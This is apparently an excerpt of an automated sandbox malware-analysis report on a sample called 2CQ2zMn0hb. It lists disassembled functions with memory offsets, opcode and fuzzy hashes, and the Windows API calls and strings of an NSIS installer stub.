Opcode Fuzzy Hash: e99c5ff348f48fc18bcf70f8a8f493cd0ceb1a035629949527408cc6948f5c23
Instruction Fuzzy Hash: 960184363081459FCB09AF64EC945A97BA2FF4A3107118069F9159B265DB36CE22DF90

Function 0016FC3F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9ef40a7837bc72d747f7b870320ce2692b714fbc73e91a99a718b73f4a048c
Instruction ID: d50f2c342b9bec4b8636d251595e4cace782654da6aae3433f3d174af39ea3eb
Opcode Fuzzy Hash: ad9ef40a7837bc72d747f7b870320ce2692b714fbc73e91a99a718b73f4a048c
Instruction Fuzzy Hash: 26018174D00208EFCB04DFA5D808AE9BBB5FF8B311F5050A8E505772A0CB765996CF54

Function 3763CE60 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e576c4c13283f404343250a276114776d733b3c03bb77842cf09143af50c298
Instruction ID: e75831b6841b3f2709f9cbbbfd65fcf72ec9914c907785ca8a240f2fcb3d9e7a
Opcode Fuzzy Hash: 8e576c4c13283f404343250a276114776d733b3c03bb77842cf09143af50c298
Instruction Fuzzy Hash: 54F01434E02208CFEB04DFB9D8546EDB7B5EB8A311F50A429D404B32A1DB3AA916CF55

Function 37639608 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56020032d0e0a8c13d709f7d04c50c3d20c264f6c58989c328587936dc9b5740
Instruction ID: 1f4de1f80ca80fe348341cb7b4389fd85189200b8e7254242736cfca61265393
Opcode Fuzzy Hash: 56020032d0e0a8c13d709f7d04c50c3d20c264f6c58989c328587936dc9b5740
Instruction Fuzzy Hash: 99F0EC2038120117E20476BD5555B7F66EEDFC1391F018476F501E736ADE58DD0A83F1

Function 0016FE13 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a4ee9d452fa2cdf8bd04bae1ad7b4c4243e6be798b2cceef0eebb11c52abe7f
Instruction ID: 3516f2d658f409406e486caca00b4419575d2688ea6dd215ca70a9eb5df5cb87
Opcode Fuzzy Hash: 3a4ee9d452fa2cdf8bd04bae1ad7b4c4243e6be798b2cceef0eebb11c52abe7f
Instruction Fuzzy Hash: 84F01C74D05308DFDB05EFB4A54969CBFF0AB46301F6150AAD819A7262EB324A56DB40

Function 3763943B Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be3ff32af08abad5c7647ea2ee0503c9689b3202cabd101ccec024cac422318e
Instruction ID: 3e16ece9ed4b678b9d0a26890027f3f2a6add15947c994432f207c4d81d97696
Opcode Fuzzy Hash: be3ff32af08abad5c7647ea2ee0503c9689b3202cabd101ccec024cac422318e
Instruction Fuzzy Hash: 74E0D830555340CFD30196298DD4B38B7A8FF82759B1444FAD1458BA37C652A849D745

Function 00161877 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a302fcedf224cee6a9cc2054c3a55f28c2de2dfd8bc39c44db740af636776ff
Instruction ID: 270b12c4428589d05e3e81986e029d53748d421fd3fe03cddfadb36f389a006b
Opcode Fuzzy Hash: 9a302fcedf224cee6a9cc2054c3a55f28c2de2dfd8bc39c44db740af636776ff
Instruction Fuzzy Hash: 20E0D831D113578EC7129FB0D8044DDBB30FE83310B0142A7D0147B050EB34194EC762

Function 0016FE20 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 865be4199e1014836c8ebff34312b064abbd2c069c88595b126e75cc1fe09dff
Instruction ID: bc0d601d2be39fc3bd38a0be7a8a34c5ab9edcfc3ff67f06a528698d6ed0de4c
Opcode Fuzzy Hash: 865be4199e1014836c8ebff34312b064abbd2c069c88595b126e75cc1fe09dff
Instruction Fuzzy Hash: FBE09274D04208DFC704DFB8E44869CBBF4EB49301F6080B9D804A3310EB319E52CB40

Function 00161888 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c558cc39819e034431a0ee7b0f84aacc075a6db457739eac980aae47ba1e018
Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
Opcode Fuzzy Hash: 7c558cc39819e034431a0ee7b0f84aacc075a6db457739eac980aae47ba1e018
Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1

Function 0016FF23 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 907834e5f2697bdf80fb02976c3f3077b5664ce354fe8de78e557b8f2f492320
Instruction ID: 6148f239e367e6c5665b073a445dba769ac26e997926a720b5cd4f45026c8301
Opcode Fuzzy Hash: 907834e5f2697bdf80fb02976c3f3077b5664ce354fe8de78e557b8f2f492320
Instruction Fuzzy Hash: 55D0C27080A249DFC7018B64A8056A8FB74AB03301F0011E9D40863153D7310D65D345

Function 3763CF30 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56016ad6dcb826f90630b7ae28ae88cf979ab9c1716334ba9134b44c53c8d009
Instruction ID: 7175f93dfced039e1485a0ce395070a39b2b830203c975f64dbc6ca8e3034f4a
Opcode Fuzzy Hash: 56016ad6dcb826f90630b7ae28ae88cf979ab9c1716334ba9134b44c53c8d009
Instruction Fuzzy Hash: 8DD05E3A20C2804FC7128634E8524D87F705F5322471552EAD085DBE73C152984A8712

Function 001656FF Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a3cee89e4b02ad46918cc2b0ea360952efa102c6ca3d55abb699544a059df2
Instruction ID: 7d03a92592bebe46182e45fbaa52231fbc794685a16fce879e8856025824bffb
Opcode Fuzzy Hash: 41a3cee89e4b02ad46918cc2b0ea360952efa102c6ca3d55abb699544a059df2
Instruction Fuzzy Hash: 63D0C23554C3444FC607DB36BD905867B6B9F802007209131D0010E67EDE346A8BD760

Function 3763D095 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98d044501cd76fc58cfcbaa0f9807dec41eadfedaf6e6f1d1c5dfa5e7473a23f
Instruction ID: 590c2203edc1a918e7fb080a495e9cd88ef9e23068de27cb43a7a2742a3d155d
Opcode Fuzzy Hash: 98d044501cd76fc58cfcbaa0f9807dec41eadfedaf6e6f1d1c5dfa5e7473a23f
Instruction Fuzzy Hash: 9ED05B2114E7900FD71682287814D596F754EC761070545E6E048CB1E596850A498746

Function 00169F6D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817bb52a4a8189b0fc4ec7726e83cec88e7308417f86d399926eb195dcb20a72
Instruction ID: ac3eacb7c8d8f0a4ede675a5c42f927971ab596706c5bb73d2a8530ebe803afd
Opcode Fuzzy Hash: 817bb52a4a8189b0fc4ec7726e83cec88e7308417f86d399926eb195dcb20a72
Instruction Fuzzy Hash: 4DD0673AB40018AFCB049F98EC808DDFB76FB98221B048116F915A3261C6319965DB50

Function 0016FF30 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c90cd19333f1628959c647489ebf848e513f5d7d2d7257ced905ecc1f8595dbe
Instruction ID: 1bf903b3baa514c82a212c700239117bc844564cbc2a767c7676e4bf22c1e724
Opcode Fuzzy Hash: c90cd19333f1628959c647489ebf848e513f5d7d2d7257ced905ecc1f8595dbe
Instruction Fuzzy Hash: 68D0C970C16209DFC744DBA8E805AA9B779EB47312F4051A8A40863251DB715D24D699

Function 376395D8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 237a6c65cb6597b178e1da6143b673880caca4c6ef0bdd5ab648e37b70c76dd3
Instruction ID: 316465bdd26eb977b61de559d063b265072fe45edf00721e8988ea94df249d65
Opcode Fuzzy Hash: 237a6c65cb6597b178e1da6143b673880caca4c6ef0bdd5ab648e37b70c76dd3
Instruction Fuzzy Hash: 84C08033247610176718A21CB490D9E565DCDC5711F10DD77F004D71384E549D4FC5C9

Function 3763BD48 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88c5ac78e8fe560aa8e1ccb03bf461ceca8478cd778783c87ce8a6186f7a61af
Instruction ID: 463e292bc8bff3669562f3bfd7f3d82aac4589c5acca9fc18a93aa920c9d13ae
Opcode Fuzzy Hash: 88c5ac78e8fe560aa8e1ccb03bf461ceca8478cd778783c87ce8a6186f7a61af
Instruction Fuzzy Hash: 50C08C74012E098BF2042F60BC1CB79B7B8F707323FC82D10E00D02831CBB89424CA49

Function 00165710 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf33dc7308c806959f64cbe75d4be926939a59b9e2ec5dd66451bcda57329a84
Instruction ID: f7cab79f8a3251fce1559d3a464ea52c5353b972f3e0ff67f18721c515469851
Opcode Fuzzy Hash: bf33dc7308c806959f64cbe75d4be926939a59b9e2ec5dd66451bcda57329a84
Instruction Fuzzy Hash: 78C012300543084EC549EF6AFE45A55B72EAF802047608530A0060657EEFB8694A8BD0

Function 376394B4 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ba1ae4fc0e9a3532310465cf7635fca34d82a4f8756fc4a2c3478087865d44
Instruction ID: 926618641c6f00c603d0129f7d9a7374ce87f9b85d22960229c3190719b9e069
Opcode Fuzzy Hash: 16ba1ae4fc0e9a3532310465cf7635fca34d82a4f8756fc4a2c3478087865d44
Instruction Fuzzy Hash: 61C08C303A82048FE200AA1DCA94A2133ACEF85B04F2018E0F1048B675CB22FC008A04

Function 0016FFC8 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5018dc5a17c4bf77f37e82bfb5e59cef994a5d82b5d16eead181e0041ddb23
Instruction ID: b2b87759b1612eb36ff0347e2001e0bdd41346efa6db2734f629ce2a197ba042
Opcode Fuzzy Hash: 2a5018dc5a17c4bf77f37e82bfb5e59cef994a5d82b5d16eead181e0041ddb23
Instruction Fuzzy Hash: 5EA0223C300002C3C308EB28E000C0FF3832FE0A08B00C02C0008030E08820CC028023

Non-executed Functions

Function 004034A5 Relevance: 75.7, APIs: 32, Strings: 11, Instructions: 410stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

UXTHEME, xrefs: 004034F5, 004034FA, 00403500
TMP, xrefs: 00403735
\Temp, xrefs: 004036FF
~nsu, xrefs: 00403845
Error launching installer, xrefs: 004037D0
.tmp, xrefs: 00403861
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
Low, xrefs: 0040371B
SeShutdownPrivilege, xrefs: 0040396F
TEMP, xrefs: 0040372D
NSIS Error, xrefs: 00403567

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-334447862
Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,00000408), ref: 00404DEF
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

N, xrefs: 00405057
, xrefs: 00405385
M, xrefs: 00404F76

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 3763AFF8 Relevance: 23.0, Strings: 18, Instructions: 461COMMON

Download Yara Rule

Strings

PH]q, xrefs: 3763B331
PH]q, xrefs: 3763B532
Lj@p, xrefs: 3763B590
Lj@p, xrefs: 3763B2AB
PH]q, xrefs: 3763B619
Lj@p, xrefs: 3763B3A3
PH]q, xrefs: 3763B345
PH]q, xrefs: 3763B51E
0o@p, xrefs: 3763B147
", xrefs: 3763B7CE
Lj@p, xrefs: 3763B3B9
Lj@p, xrefs: 3763B498
PH]q, xrefs: 3763B62D
Lj@p, xrefs: 3763B2C1
PH]q, xrefs: 3763B43D
Lj@p, xrefs: 3763B5A6
Lj@p, xrefs: 3763B4AE
PH]q, xrefs: 3763B429

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
API String ID: 0-1947560563
Opcode ID: 2a489e6f05ee0c53d5c79a742a6b2f552e574f7b7490a6acc47d931b8f8600de
Instruction ID: 32e3285ae1a7d71a65449d00ada0b292211a5ddbaca89ce7ac430efd131befc1
Opcode Fuzzy Hash: 2a489e6f05ee0c53d5c79a742a6b2f552e574f7b7490a6acc47d931b8f8600de
Instruction Fuzzy Hash: 3F32AE74E012188FEB54CF69C994B9DBBB2BF89310F1080E9D809A7365DB75AE85CF14

Function 00405AFA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00437800,75922EE0,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

\*.*, xrefs: 00405B65
0WB, xrefs: 00405B53

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: 0WB$\*.*
API String ID: 2035342205-351390296
Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 3763AFF7 Relevance: 12.9, Strings: 10, Instructions: 361COMMON

Download Yara Rule

Strings

PH]q, xrefs: 3763B331
0o@p, xrefs: 3763B147
", xrefs: 3763B7CE
PH]q, xrefs: 3763B62D
PH]q, xrefs: 3763B532
PH]q, xrefs: 3763B43D
PH]q, xrefs: 3763B619
PH]q, xrefs: 3763B429
PH]q, xrefs: 3763B345
PH]q, xrefs: 3763B51E

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
API String ID: 0-455001714
Opcode ID: 812c4c646515aecdb9f9335c34763d6ef558fe69e125c895d2658d3e2a0ea366
Instruction ID: 1ebfde536435c1dc03bf2e4792db1e48e36851784aff5f7056cfd2caa3f9e31e
Opcode Fuzzy Hash: 812c4c646515aecdb9f9335c34763d6ef558fe69e125c895d2658d3e2a0ea366
Instruction Fuzzy Hash: C802A1B4E012188FEB58CF65D994B9DBBB2BF89300F1081A9D409A7365DB355E85CF10

Function 3763AFE8 Relevance: 12.8, Strings: 10, Instructions: 341COMMON

Download Yara Rule

Strings

PH]q, xrefs: 3763B331
0o@p, xrefs: 3763B147
", xrefs: 3763B7CE
PH]q, xrefs: 3763B62D
PH]q, xrefs: 3763B532
PH]q, xrefs: 3763B43D
PH]q, xrefs: 3763B619
PH]q, xrefs: 3763B429
PH]q, xrefs: 3763B345
PH]q, xrefs: 3763B51E

Memory Dump Source

